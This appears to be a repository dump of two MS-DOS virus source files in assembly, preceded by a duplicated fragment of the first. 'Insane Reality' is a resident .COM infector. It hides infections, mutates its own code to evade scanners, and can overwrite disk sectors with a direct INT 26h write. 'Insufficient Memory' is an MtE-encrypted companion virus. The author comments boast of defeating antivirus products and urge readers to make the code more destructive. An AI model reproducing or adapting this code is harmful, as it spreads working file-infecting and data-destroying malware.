je encode_two_bytes ; then change to 2
mov al,5Eh ; encode a pop si
stosb
rep movsb ; then copy decrypt over
mov al,90h ; plus a nop to keep virus
stosb ; length constant
xor ax,ax ; clear the flag
jmp short set_evenodd_flag
encode_two_bytes:
mov ax,0C68Fh ; encode a two byte form of
stosw ; pop si
rep movsb
mov ax,1 ; set evenodd flag
set_evenodd_flag:
mov cs:evenodd,ax
findint21:
mov ah,30h ; Get DOS version
int 21h
cmp ax,1E03h ; DOS 3.30?
jne notDOS33
mov ah,34h ; Get DOS critical error ptr
int 21h
mov bx,1460h ; int 21h starts here
jmp short alterint21
notDOS33:
mov ax,3521h ;just get current int 21 handler
int 21h
alterint21:
mov oldint21,bx
mov word ptr ds:oldint21+2,es
mov si,21h*4 ; save old int 21 handler
pop ds ; found in interrupt table
push si
push cs
pop es
mov di,offset topint21
movsw
movsw
pop di ; and put new one in
push ds
pop es
mov ax,offset int21
stosw
mov ax,cs
stosw
mov di,offset startencrypt
mov al,cs:encrypt_value1 ; decrypt original
decryptcode: ; program code
xor cs:[di],al
inc di
cmp di,offset decryptcode
jb decryptcode
returnCOM:
mov ah,62h ; Get current PSP
int 21h
push bx ; restore segment registers
mov ds,bx
mov es,bx
mov ax,100h
push ax
retf ; Return to PSP:100h
infect:
push si
push ds
push es
push di
cld
push cs
pop ds
xor dx,dx ; go to start of file
call movefilepointer
mov dx,offset readbuffer ; and read 3 bytes
mov ah,3Fh
mov cx,3
call callint21
jc exiterror
xor di,di
mov ax,readbuffer
mov cx,word ptr ds:[0]
cmp cx,ax ; check if already infected
je go_exitinfect
cmp al,0EBh ; jmp short?
jne checkifJMP
mov al,ah
xor ah,ah
add ax,2
mov di,ax ; di = jmp location
checkifJMP:
cmp al,0E9h ; jmp?
jne checkifEXE ; nope
mov ax,word ptr readbuffer+1
add ax,3
mov di,ax ; di = jmp location
xor ax,ax
checkifEXE:
cmp ax,'MZ'
je exiterror
cmp ax,'ZM'
jne continue_infect
exiterror:
stc
go_exitinfect:
jmp short exitinfect
nop
continue_infect:
mov dx,di
push cx
call movefilepointer ; go to jmp location
mov dx,virlength ; and read 1024 more bytes
mov ah,3Fh
mov cx,dx
call callint21
pop cx
jc exiterror
cmp readbuffer,cx
je go_exitinfect
mov ax,di
sub ah,0FCh
cmp ax,filesize
jae exiterror
mov dx,filesize
call movefilepointer
mov dx,virlength ; write virus to middle
mov cx,dx ; of file
mov ah,40h
call callint21
jc exitinfect
mov dx,di
call movefilepointer
push cs
pop es
mov di,offset readbuffer
push di
push di
xor si,si
mov cx,di
rep movsb
mov si,offset encrypt_value2
mov al,encrypted_file
encryptfile: ; encrypt infected file
xor [si],al
inc si
cmp si,7FFh
jb encryptfile
pop cx
pop dx
mov ah,40h ; and write it to end of file
call callint21
exitinfect:
pop di
pop es
pop ds
pop si
retn
int21:
cmp ax,4B00h ; Execute?
je execute
cmp ah,3Eh ; Close?
je handleclose
cmp ah,11h ; Find first?
je findfirstnext
cmp ah,12h ; Find next?
je findfirstnext
exitint21:
db 0EAh ; jmp far ptr
topint21 dw 0, 0
findfirstnext:
push si
mov si,offset topint21
pushf
call dword ptr cs:[si] ; call int 21 handler
pop si
push ax
push bx
push es
mov ah,2Fh ; Get DTA
call callint21
cmp byte ptr es:[bx],0FFh ; extended FCB?
jne noextendedFCB
add bx,7 ; convert to normal
noextendedFCB:
mov ax,es:[bx+17h] ; Get time
and ax,1Fh ; and check infection stamp
cmp ax,1Eh
jne exitfindfirstnext
mov ax,es:[bx+1Dh]
cmp ax,virlength * 2 + 1 ; too small for infection?
jb exitfindfirstnext ; then not infected
sub ax,virlength ; alter file size
mov es:[bx+1Dh],ax
exitfindfirstnext:
pop es
pop bx
pop ax
iret
int24:
mov al,3
iret
callint21:
pushf
call dword ptr cs:oldint21
retn
movefilepointer:
xor cx,cx
mov ax,4200h
call callint21
retn
execute:
push ax
push bx
mov cs:runningflag,0
mov ax,3D00h ; open file read/only
call callint21
mov bx,ax
mov ah,3Eh ; close file
int 21h ; to trigger infection
pop bx
pop ax
go_exitint21:
jmp short exitint21
handleclose:
or cs:runningflag,0 ; virus currently active?
jnz go_exitint21
push cx
push dx
push di
push es
push ax
push bx
call getint13and24
call setint13and24
; convert handle to filename
mov ax,1220h ; get job file table entry
int 2Fh
jc handleclose_noinfect ; exit on error
mov ax,1216h ; get address of SFT
mov bl,es:[di]
xor bh,bh
int 2Fh ; es:di->file entry in SFT
mov ax,es:[di+11h]
mov cs:filesize,ax ; save file size,
mov ax,es:[di+0Dh]
and al,0F8h
mov cs:timestore,ax ; time,
mov ax,es:[di+0Fh]
mov cs:datestore,ax ; and date
cmp word ptr es:[di+29h],'MO' ; check for COM extension
jne handleclose_noinfect
cmp byte ptr es:[di+28h],'C'
jne handleclose_noinfect
cmp cs:filesize,0FA00h ; make sure not too large
jae handleclose_noinfect
mov al,20h ; alter file attribute
xchg al,es:[di+4]
mov ah,2 ; alter open mode to
xchg ah,es:[di+2] ; read/write
pop bx
push bx
push ax
call infect
pop ax
mov es:[di+4],al ; restore file attribute
mov es:[di+2],ah ; and open mode
mov cx,cs:timestore
jc infection_not_successful
or cl,1Fh ; make file infected in
and cl,0FEh ; seconds field
infection_not_successful:
mov dx,cs:datestore ; restore file time/date
mov ax,5701h
call callint21
handleclose_noinfect:
pop bx
pop ax
pop es
pop di
pop dx
pop cx
call callint21
call setint13and24
retf 2 ; exit with flags intact
getint13and24:
mov ah,13h ; Get BIOS int 13h handler
int 2Fh
mov cs:oldint13,bx
mov cs:oldint13+2,es
int 2Fh ; Restore it
mov cs:oldint24,offset int24
mov cs:oldint24+2,cs
retn
setint13and24:
push ax
push si
push ds
pushf
cli
cld
xor ax,ax
mov ds,ax ; ds->interrupt table
mov si,13h*4
lodsw
xchg ax,cs:oldint13 ; replace old int 13 handler
mov [si-2],ax ; with original BIOS handler
lodsw
xchg ax,cs:oldint13+2
mov [si-2],ax
mov si,24h*4 ; replace old int 24 handler
lodsw ; with our own handler
xchg ax,cs:oldint24
mov [si-2],ax
lodsw
xchg ax,cs:oldint24+2
mov [si-2],ax
popf
pop ds
pop si
pop ax
retn
;ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄ--ÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ----ÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
; Okey..don't change the text to much here, cuz the virus will refuse
; to work correctly if you writes to many chars..If you wanna modify
; this virus, make it a bit more destructive than it already is. I
; love destructive codes..It reminds me of my Brain..(??) <grin>..
;ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄ--ÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ----ÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
message db 'Insane Reality.. ', 0 ; Mutation name..
db 'The Unforgiven / IR.. ' ; That's me..
db 0, 0, 0, 0, 0
encrypt_value1 db 0
readbuffer dw 0
db 253 dup (0)
nothing1 db 0
db 152 dup (0)
encrypt_value2 db 0
db 614 dup (0)
encrypted_file db 0
db 1280 dup (0)
carrier:
dw 20CDh
end leech
; Greetings goes out to Raver, Metal Militia, Scavenger,
; and all the others livi'n in the Insane Reality of today.

601
MSDOS/Virus.MSDOS.Unknown.insanery.asm Normal file
View File

@ -0,0 +1,601 @@
; VirusName : Insane Reality
; Country : Sweden
; Author : The Unforiven / Immortal Riot
; Date : 22/09/1993
;
;
; This is a mutation of the Leech virus, and well,
; havn't really changed much in this code, just
; fooled Mcafee's Scan and Dr Alans Toolkit..
;
; Okey, this might not be the very best mutation born,
; but think in this way, if this mutation is so bad
; then aren't the anti-virus products even worse ?
;
; The original virus was pretty "OK", it is a non-over-
; writing resident .COM. It will infect the program
; after you have started it. It will not infect renamed
; exe files. (..It looks at the victim's fileheader..)
;
; When the virus is in memory a infected files attributes
; (..size/date/time..) will not be discovored. If you boot
; your computer, and throw the virus out from memory,
; you'll see that the file has been changed. If an
; infected file is being run again, the virus will
; replace the infected file with its old file-attributes.
;
; This virus was originally written in Bulgaria..
; (..where else..) and I would like to thank the
; scratch coder of this little babe very much...
;
; Really hope this file will annoy some folks around,
; cuz it certainly annoyed me!..<no more comments>...
;
; Mcafee's Scan v108 can't find this, and neither can
; S&S Toolkit 6.54. Havn't tried with Tbscan/F-prot,
; but they will probably identify this as the leech virus.
;
; Beware of the Insane Reality we're living in!
; Signed The Unforgiven / Immortal Riot
.model tiny
.code
org 0
; ÄÄ---Ä-ÄÄÄÄÄ--Ä-ÄÄÄÄÄ--ÄÄÄÄ-Ä-ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄ-ÄÄ-
; Disassembly by Dark Angel of Phalcon/Skism
; Assemble with Tasm /m Insane.asm, then link
; and use exe2bin for make this into a .com..
; Ä-ÄÄÄ-ÄÄÄÄÄÄÄÄÄ--ÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄ--ÄÄÄÄÄÄ--ÄÄ-
virlength = (readbuffer - leech)
reslength = (((encrypted_file - leech + 15) / 16) + 2)
leech:
jmp short enter_leech
filesize dw offset carrier
oldint21 dw 0, 0
oldint13 dw 0, 0
oldint24 dw 0, 0
datestore dw 0
timestore dw 0
runningflag db 1
evenodd dw 0
enter_leech:
call next
next:
pop si
db 0 ; Scan-fooler..
mutatearea1:
cli ; prevent all interupts
push ds ; Why?
pop es
mov bp,sp ; save sp
mov sp,si ; sp = offset next
add sp,encrypt_value1 - 1 - next
mutatearea2:
mov cx,ss ; save ss
mov ax,cs
mov ss,ax ; ss = PSP
pop bx ; get encryption value
dec sp
dec sp
add si,startencrypt - next
nop
decrypt:
mutatearea3:
pop ax
xor al,bh ; decrypt away!
push ax
dec sp
cmp sp,si
jae decrypt
startencrypt:
mov ax,es
dec ax
mov ds,ax ; ds->MCB
db 81h,6,3,0 ;add word ptr ds:[3],-reslength
dw 0 - reslength
mov bx,ds:[3] ; bx = memory size
mov byte ptr ds:[0],'Z' ; mark end of chain
inc ax ; ax->PSP
inc bx
add bx,ax ; bx->high area
mov es,bx ; as does es
mov ss,cx ; restore ss
add si,leech - startencrypt
mov bx,ds ; save MCB segment
mov ds,ax
mov sp,bp ; restore sp
push si
xor di,di
mov cx,virlength ; 1024 bytes
cld
rep movsb
pop si
push bx
mov bx,offset highentry
push es
push bx
retf ; jmp to highentry in
; high memory
highentry:
mov es,ax ; es->PSP
mov ax,cs:filesize
add ax,100h ; find stored area
mov di,si
mov si,ax
mov cx,virlength
rep movsb ; and restore over virus code
pop es ; MCB
xor ax,ax
mov ds,ax ; ds -> interrupt table
sti
cmp word ptr ds:21h*4,offset int21 ; already resident?
jne go_resident
db 26h,81h,2eh,3,0 ;sub word ptr es:[3],-reslength
dw 0 - reslength ;alter memory size
test byte ptr ds:[46Ch],0E7h ;1.17% chance of activation
jnz exit_virus
push cs
pop ds
mov si,offset message ; "Insane Reality.."
display_loop: ; display ASCIIZ string
lodsb ; get next character
or al,0 ; exit if 0
jz exit_display_loop
mov ah,0Eh ; otherwise write character
int 10h
jmp short display_loop
exit_display_loop:
mov ah,32h ; Get DPB -> DS:BX
xor dl,dl
int 21h
jc exit_virus ; exit on error
call getint13and24
call setint13and24
mov dx,[bx+10h] ; first sector of root
; directory
; BUG: won't work in DOS 4+
mov ah,19h ; default drive -> al
int 21h
mov cx,2 ; Overwrite root directory
int 26h ; Direct write..
pop bx
call setint13and24 ; restore int handlers
exit_virus:
jmp returnCOM
go_resident:
db 26h, 81h, 6, 12h, 0 ;add word ptr es:12h,-reslength
dw 0 - reslength ;alter top of memory in PSP
mov bx,ds:46Ch ;BX = random #
push ds
push cs
pop ds
push cs
pop es
mov runningflag,1 ; reset flag
and bh,80h
mov nothing1,bh
mutate1:
test bl,1
jnz mutate2
mov si,offset mutatearea1
add si,evenodd
lodsb
xchg al,[si] ; swap instructions
mov [si-1],al
mutate2:
test bl,2
jnz mutate3
mov si,offset mutatearea2
add si,evenodd
lodsw
xchg ax,[si] ; swap instructions
mov [si-2],ax
mutate3:
test bl,4
jnz mutate4
mov si,offset mutatearea3
mov al,2
xor [si],al ; flip between ax & dx
xor [si+2],al
xor [si+3],al
mutate4:
test bl,8
jnz findint21
mov si,offset next
mov di,offset readbuffer
mov cx,offset enter_leech
push si
push di
lodsb
cmp al,5Eh ; 1 byte pop si?
je now_single_byte_encode
inc si ; skip second byte of two
; byte encoding of pop si
now_single_byte_encode:
push cx
rep movsb
pop cx
pop si
pop di
cmp al,5Eh ; 1 byte pop si?
je encode_two_bytes ; then change to 2
mov al,5Eh ; encode a pop si
stosb
rep movsb ; then copy decrypt over
mov al,90h ; plus a nop to keep virus
stosb ; length constant
xor ax,ax ; clear the flag
jmp short set_evenodd_flag
encode_two_bytes:
mov ax,0C68Fh ; encode a two byte form of
stosw ; pop si
rep movsb
mov ax,1 ; set evenodd flag
set_evenodd_flag:
mov cs:evenodd,ax
findint21:
mov ah,30h ; Get DOS version
int 21h
cmp ax,1E03h ; DOS 3.30?
jne notDOS33
mov ah,34h ; Get DOS critical error ptr
int 21h
mov bx,1460h ; int 21h starts here
jmp short alterint21
notDOS33:
mov ax,3521h ;just get current int 21 handler
int 21h
alterint21:
mov oldint21,bx
mov word ptr ds:oldint21+2,es
mov si,21h*4 ; save old int 21 handler
pop ds ; found in interrupt table
push si
push cs
pop es
mov di,offset topint21
movsw
movsw
pop di ; and put new one in
push ds
pop es
mov ax,offset int21
stosw
mov ax,cs
stosw
mov di,offset startencrypt
mov al,cs:encrypt_value1 ; decrypt original
decryptcode: ; program code
xor cs:[di],al
inc di
cmp di,offset decryptcode
jb decryptcode
returnCOM:
mov ah,62h ; Get current PSP
int 21h
push bx ; restore segment registers
mov ds,bx
mov es,bx
mov ax,100h
push ax
retf ; Return to PSP:100h
infect:
push si
push ds
push es
push di
cld
push cs
pop ds
xor dx,dx ; go to start of file
call movefilepointer
mov dx,offset readbuffer ; and read 3 bytes
mov ah,3Fh
mov cx,3
call callint21
jc exiterror
xor di,di
mov ax,readbuffer
mov cx,word ptr ds:[0]
cmp cx,ax ; check if already infected
je go_exitinfect
cmp al,0EBh ; jmp short?
jne checkifJMP
mov al,ah
xor ah,ah
add ax,2
mov di,ax ; di = jmp location
checkifJMP:
cmp al,0E9h ; jmp?
jne checkifEXE ; nope
mov ax,word ptr readbuffer+1
add ax,3
mov di,ax ; di = jmp location
xor ax,ax
checkifEXE:
cmp ax,'MZ'
je exiterror
cmp ax,'ZM'
jne continue_infect
exiterror:
stc
go_exitinfect:
jmp short exitinfect
nop
continue_infect:
mov dx,di
push cx
call movefilepointer ; go to jmp location
mov dx,virlength ; and read 1024 more bytes
mov ah,3Fh
mov cx,dx
call callint21
pop cx
jc exiterror
cmp readbuffer,cx
je go_exitinfect
mov ax,di
sub ah,0FCh
cmp ax,filesize
jae exiterror
mov dx,filesize
call movefilepointer
mov dx,virlength ; write virus to middle
mov cx,dx ; of file
mov ah,40h
call callint21
jc exitinfect
mov dx,di
call movefilepointer
push cs
pop es
mov di,offset readbuffer
push di
push di
xor si,si
mov cx,di
rep movsb
mov si,offset encrypt_value2
mov al,encrypted_file
encryptfile: ; encrypt infected file
xor [si],al
inc si
cmp si,7FFh
jb encryptfile
pop cx
pop dx
mov ah,40h ; and write it to end of file
call callint21
exitinfect:
pop di
pop es
pop ds
pop si
retn
int21:
cmp ax,4B00h ; Execute?
je execute
cmp ah,3Eh ; Close?
je handleclose
cmp ah,11h ; Find first?
je findfirstnext
cmp ah,12h ; Find next?
je findfirstnext
exitint21:
db 0EAh ; jmp far ptr
topint21 dw 0, 0
findfirstnext:
push si
mov si,offset topint21
pushf
call dword ptr cs:[si] ; call int 21 handler
pop si
push ax
push bx
push es
mov ah,2Fh ; Get DTA
call callint21
cmp byte ptr es:[bx],0FFh ; extended FCB?
jne noextendedFCB
add bx,7 ; convert to normal
noextendedFCB:
mov ax,es:[bx+17h] ; Get time
and ax,1Fh ; and check infection stamp
cmp ax,1Eh
jne exitfindfirstnext
mov ax,es:[bx+1Dh]
cmp ax,virlength * 2 + 1 ; too small for infection?
jb exitfindfirstnext ; then not infected
sub ax,virlength ; alter file size
mov es:[bx+1Dh],ax
exitfindfirstnext:
pop es
pop bx
pop ax
iret
int24:
mov al,3
iret
callint21:
pushf
call dword ptr cs:oldint21
retn
movefilepointer:
xor cx,cx
mov ax,4200h
call callint21
retn
execute:
push ax
push bx
mov cs:runningflag,0
mov ax,3D00h ; open file read/only
call callint21
mov bx,ax
mov ah,3Eh ; close file
int 21h ; to trigger infection
pop bx
pop ax
go_exitint21:
jmp short exitint21
handleclose:
or cs:runningflag,0 ; virus currently active?
jnz go_exitint21
push cx
push dx
push di
push es
push ax
push bx
call getint13and24
call setint13and24
; convert handle to filename
mov ax,1220h ; get job file table entry
int 2Fh
jc handleclose_noinfect ; exit on error
mov ax,1216h ; get address of SFT
mov bl,es:[di]
xor bh,bh
int 2Fh ; es:di->file entry in SFT
mov ax,es:[di+11h]
mov cs:filesize,ax ; save file size,
mov ax,es:[di+0Dh]
and al,0F8h
mov cs:timestore,ax ; time,
mov ax,es:[di+0Fh]
mov cs:datestore,ax ; and date
cmp word ptr es:[di+29h],'MO' ; check for COM extension
jne handleclose_noinfect
cmp byte ptr es:[di+28h],'C'
jne handleclose_noinfect
cmp cs:filesize,0FA00h ; make sure not too large
jae handleclose_noinfect
mov al,20h ; alter file attribute
xchg al,es:[di+4]
mov ah,2 ; alter open mode to
xchg ah,es:[di+2] ; read/write
pop bx
push bx
push ax
call infect
pop ax
mov es:[di+4],al ; restore file attribute
mov es:[di+2],ah ; and open mode
mov cx,cs:timestore
jc infection_not_successful
or cl,1Fh ; make file infected in
and cl,0FEh ; seconds field
infection_not_successful:
mov dx,cs:datestore ; restore file time/date
mov ax,5701h
call callint21
handleclose_noinfect:
pop bx
pop ax
pop es
pop di
pop dx
pop cx
call callint21
call setint13and24
retf 2 ; exit with flags intact
getint13and24:
mov ah,13h ; Get BIOS int 13h handler
int 2Fh
mov cs:oldint13,bx
mov cs:oldint13+2,es
int 2Fh ; Restore it
mov cs:oldint24,offset int24
mov cs:oldint24+2,cs
retn
setint13and24:
push ax
push si
push ds
pushf
cli
cld
xor ax,ax
mov ds,ax ; ds->interrupt table
mov si,13h*4
lodsw
xchg ax,cs:oldint13 ; replace old int 13 handler
mov [si-2],ax ; with original BIOS handler
lodsw
xchg ax,cs:oldint13+2
mov [si-2],ax
mov si,24h*4 ; replace old int 24 handler
lodsw ; with our own handler
xchg ax,cs:oldint24
mov [si-2],ax
lodsw
xchg ax,cs:oldint24+2
mov [si-2],ax
popf
pop ds
pop si
pop ax
retn
;ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄ--ÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ----ÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
; Okey..don't change the text to much here, cuz the virus will refuse
; to work correctly if you writes to many chars..If you wanna modify
; this virus, make it a bit more destructive than it already is. I
; love destructive codes..It reminds me of my Brain..(??) <grin>..
;ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄ--ÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄ----ÄÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄ-
message db 'Insane Reality.. ', 0 ; Mutation name..
db 'The Unforgiven / IR.. ' ; That's me..
db 0, 0, 0, 0, 0
encrypt_value1 db 0
readbuffer dw 0
db 253 dup (0)
nothing1 db 0
db 152 dup (0)
encrypt_value2 db 0
db 614 dup (0)
encrypted_file db 0
db 1280 dup (0)
carrier:
dw 20CDh
end leech
; Greetings goes out to Raver, Metal Militia, Scavenger,
; and all the others livi'n in the Insane Reality of today.

178
MSDOS/Virus.MSDOS.Unknown.insuff.asm Normal file
View File

@ -0,0 +1,178 @@
;INSUFFICIENT MEMORY virus - by URNST KOUCH for Crypt Newsletter #6
;INSUFF MEMO is a simple MUTATION ENGINE loaded spawning virus, which
;confines itself to the current directory. To assemble with TASM 2.5, user
;must have complete MTE091B software package (including RND.OBJ,
;MTE.OBJ and stubfile, NOPS.BIN). Use MAKE2.BAT included in this
;issue of the Crypt Newsletter to assemble all proper
;components. Observant readers will notice INSUFF MEMO takes advantage of
;VCL 1.0 code as well as notation from the SARA virus. INSUFF MEMO is
;a non-threatening, unique example of an MtE-loaded companion virus -
;the only one in circulation, in fact.
;
;INSUFF2, included as a DEBUG script in this newsletter, is functionally
;identical to this virus. However, for those who 'require' a destructive
;program for their full enjoyment, it is loaded with a routine which
;simple checks the system time and branches to some 'dropper' code if
;after quitting time (4:00 pm). The 'dropper' reads from a data table
;and writes the NOIZ trojan to any .EXE in the current directory. By
;looking carefully at this code, several areas where 'potentially'
;destructive/nuisance routines can be added will suggest themselves.
;We do not include them for a number of reasons: 1) they are easy to
;come by in any number of books on assembly coding, the VCL 1.0 (an
;excellent source), or source code archives on mnay BBS's, and; 2)
;it allows you to get creative if you want and tinker (like I do all the
; time) with the basic layout of virus source.
;
;INSUFF3's source listing is modified to allow the virus to jump out
;of the current directory when all files in it are infected. The
;listing is publicly available at the BBS's listed at the end of the
;Crypt newsletter.
.model tiny
.radix 16
.code
extrn mut_engine: near
extrn rnd_buf: word, data_top: near
org 100
start:
call locadr
reladr:
db 'Insufficient memory'
locadr:
pop dx
mov cl,4
shr dx,cl
sub dx,10
mov cx,ds
add cx,dx ;Calculate new CS
mov dx,offset begin
push cx dx
retf
begin:
cld
mov di,offset start
push es di ;
push cs ;A carry over from the DAV
pop ds ;SARA virus, something of a curiosity
;in this companion virus
mov dx,offset dta_buf ;Set DTA
mov ah,1a
int 21
mov ax,3524 ;Hook INT 24, error handler
int 21 ;see bottom of code
push es bx
mov dx,offset fail_err
mov ax,2524
int 21
xor ax,ax ;Initialize random seed for MtE
mov [rnd_buf],ax ;could be coded, mov cs:[rnd_buf],0
push sp ;process necessary for generation of
pop cx ;MtE encryption key - see MtE docs
sub cx,sp ;for further notation
add cx,4
push cx
mov dx,offset srchnam ;EXE file-mask for spawn-name search
mov cl,3
mov ah,4e ; DOS find first file function
find_a_file:
int 021h
jc infection_done ; Exit if no files found
jmp infect ; Infect the file!
jnc infection_done ; Exit if no error
findr: mov ah,04Fh ; DOS find next file function
jmp find_a_file ; Try finding another file
infection_done:
mov ax,4C00h ;terminate
int 21h
infect:
mov ah,02Fh ; DOS get DTA address function
int 021h
mov di,bx ; DI points to the DTA
lea si,[di + 01Eh] ; SI points to file name
mov dx,si ; DX points to file name, too
mov di,offset spawn_name + 1; DI points to new name
xor ah,ah ; AH holds character count
transfer_loop:
lodsb ; Load a character
or al,al ; Is it a NULL?
je transfer_end ; If so then leave the loop
inc ah ; Add one to the character count
stosb ; Save the byte in the buffer
jmp short transfer_loop ; Repeat the loop
transfer_end:
mov byte ptr [spawn_name],ah; First byte holds char. count
mov byte ptr [di],13 ; Make CR the final character
mov di,dx ; DI points to file name
xor ch,ch ;
mov cl,ah ; CX holds length of filename
mov al,'.' ; AL holds char. to search for
repne scasb ; Search for a dot in the name
mov word ptr [di],'OC' ; Store "CO" as first two bytes
mov byte ptr [di + 2],'M' ; Store "M" to make "COM"
mov byte ptr [set_carry],0 ; Assume we'll fail
mov ax,03D00h ; DOS open file function, r/o
int 021h
jnc findr ; File already exists, so leave
mov byte ptr [set_carry],1 ; Success -- the file is OK
mov ah,03Ch ; DOS create file function
mov cx,00100111b ; CX holds file attributes (all)
int 21h
xchg bx,ax ; BX holds file handle
push dx cx
mov ax,offset data_top+0Fh
mov cl,4
shr ax,cl
mov cx,cs
add ax,cx
mov es,ax
mov dx,offset start ; DX points to start of virus
mov cx,offset _DATA ; CX holds virus length for encryption
push bp bx
mov bp,0100h ;tells MtE decryption routine will
xor si,si ;hand over control to where virus adds
xor di,di ;itself to 'infected' file, in this case offset
mov bl,0Fh ;0100h .. set si/di to 0, bl to 0Fh, all required
mov ax,101 ;set bit-field in ax
call mut_engine ;call the Mutation Engine to do its thing
pop bx ax
add ax,cx
neg ax
xor ah,ah
add ax,cx
mov ah,040h ;write encrypted virus to newly created file
int 21h
mov ah,03Eh ;close the file
int 21h
cmp byte ptr [set_carry],1
jmp infection_done ;move to end game
fail_err: ;Critical error handler
mov al,3 ;prevents virus from producing
iret ;messages on write-protected disks.
;Not handed back to machine when virus exits.
srchnam db '*.EXE',0 ;File-mask for 'spawn-search.'
.data
dta_buf db 2bh dup(?) ; Buffer for DTA
spawn_name db 12,12 dup (?),13 ; Name for next spawn
set_carry db ? ; Set-carry-on-exit flag
end start